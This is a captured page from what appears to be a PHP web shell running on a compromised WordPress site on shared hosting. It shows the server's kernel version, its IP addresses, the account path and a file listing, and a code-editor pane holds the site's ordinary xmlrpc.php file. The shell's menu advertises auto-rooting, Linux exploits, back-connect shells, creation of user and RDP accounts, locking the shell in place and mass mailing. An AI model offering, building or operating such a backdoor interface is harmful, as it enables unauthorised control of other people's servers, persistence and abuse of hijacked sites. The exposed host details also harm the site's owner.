Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
.backupOvh /
www /
www.1385394735 /
[ HOME SHELL ]
Name
Size
Permission
Action
WordPress3
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
448
B
-rwx---r-x
index.php
397
B
-rw-r--r--
license.txt
16.5
KB
-rw-r--r--
readme.html
8.99
KB
-rw-r--r--
wp-activate.php
4.17
KB
-rw-r--r--
wp-app.php
39.33
KB
-rw-r--r--
wp-blog-header.php
274
B
-rw-r--r--
wp-comments-post.php
3.89
KB
-rw-r--r--
wp-config-sample.php
3.1
KB
-rw-r--r--
wp-config.php
2.95
KB
-rw-------
wp-cron.php
2.62
KB
-rw-r--r--
wp-links-opml.php
1.95
KB
-rw-r--r--
wp-load.php
2.49
KB
-rw-r--r--
wp-login.php
27.05
KB
-rw-r--r--
wp-mail.php
7.59
KB
-rw-r--r--
wp-pass.php
413
B
-rw-r--r--
wp-register.php
334
B
-rw-r--r--
wp-settings.php
9.68
KB
-rw-r--r--
wp-signup.php
18.11
KB
-rw-r--r--
wp-trackback.php
3.62
KB
-rw-r--r--
xmlrpc.php
3.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xmlrpc.php
<?php /** * XML-RPC protocol support for WordPress * * @package WordPress */ /** * Whether this is a XMLRPC Request * * @var bool */ define('XMLRPC_REQUEST', true); // Some browser-embedded clients send cookies. We don't want them. $_COOKIE = array(); // A bug in PHP < 5.2.2 makes $HTTP_RAW_POST_DATA not set by default, // but we can do it ourself. if ( !isset( $HTTP_RAW_POST_DATA ) ) { $HTTP_RAW_POST_DATA = file_get_contents( 'php://input' ); } // fix for mozBlog and other cases where '<?xml' isn't on the very first line if ( isset($HTTP_RAW_POST_DATA) ) $HTTP_RAW_POST_DATA = trim($HTTP_RAW_POST_DATA); /** Include the bootstrap for setting up WordPress environment */ include('./wp-load.php'); if ( isset( $_GET['rsd'] ) ) { // http://archipelago.phrasewise.com/rsd header('Content-Type: text/xml; charset=' . get_option('blog_charset'), true); ?> <?php echo '<?xml version="1.0" encoding="'.get_option('blog_charset').'"?'.'>'; ?> <rsd version="1.0" xmlns="http://archipelago.phrasewise.com/rsd"> <service> <engineName>WordPress</engineName> <engineLink>http://wordpress.org/</engineLink> <homePageLink><?php bloginfo_rss('url') ?></homePageLink> <apis> <api name="WordPress" blogID="1" preferred="true" apiLink="<?php echo site_url('xmlrpc.php', 'rpc') ?>" /> <api name="Movable Type" blogID="1" preferred="false" apiLink="<?php echo site_url('xmlrpc.php', 'rpc') ?>" /> <api name="MetaWeblog" blogID="1" preferred="false" apiLink="<?php echo site_url('xmlrpc.php', 'rpc') ?>" /> <api name="Blogger" blogID="1" preferred="false" apiLink="<?php echo site_url('xmlrpc.php', 'rpc') ?>" /> <api name="Atom" blogID="" preferred="false" apiLink="<?php echo site_url('wp-app.php/service', 'rpc') ?>" /> </apis> </service> </rsd> <?php exit; } include_once(ABSPATH . 'wp-admin/includes/admin.php'); include_once(ABSPATH . WPINC . '/class-IXR.php'); include_once(ABSPATH . WPINC . '/class-wp-xmlrpc-server.php'); // Turn off all warnings and errors. // error_reporting(0); /** * Posts submitted via the xmlrpc interface get that title * @name post_default_title * @var string */ $post_default_title = ""; /** * Whether to enable XMLRPC Logging. * * @name xmlrpc_logging * @var int|bool */ $xmlrpc_logging = 0; /** * logIO() - Writes logging info to a file. * * @uses $xmlrpc_logging * @package WordPress * @subpackage Logging * * @param string $io Whether input or output * @param string $msg Information describing logging reason. * @return bool Always return true */ function logIO($io,$msg) { global $xmlrpc_logging; if ($xmlrpc_logging) { $fp = fopen("../xmlrpc.log","a+"); $date = gmdate("Y-m-d H:i:s "); $iot = ($io == "I") ? " Input: " : " Output: "; fwrite($fp, "\n\n".$date.$iot.$msg); fclose($fp); } return true; } if ( isset($HTTP_RAW_POST_DATA) ) logIO("I", $HTTP_RAW_POST_DATA); // Make sure wp_die output is XML add_filter( 'wp_die_handler', '_xmlrpc_wp_die_filter' ); // Allow for a plugin to insert a different class to handle requests. $wp_xmlrpc_server_class = apply_filters('wp_xmlrpc_server_class', 'wp_xmlrpc_server'); $wp_xmlrpc_server = new $wp_xmlrpc_server_class; // Fire off the request $wp_xmlrpc_server->serve_request(); ?>
Close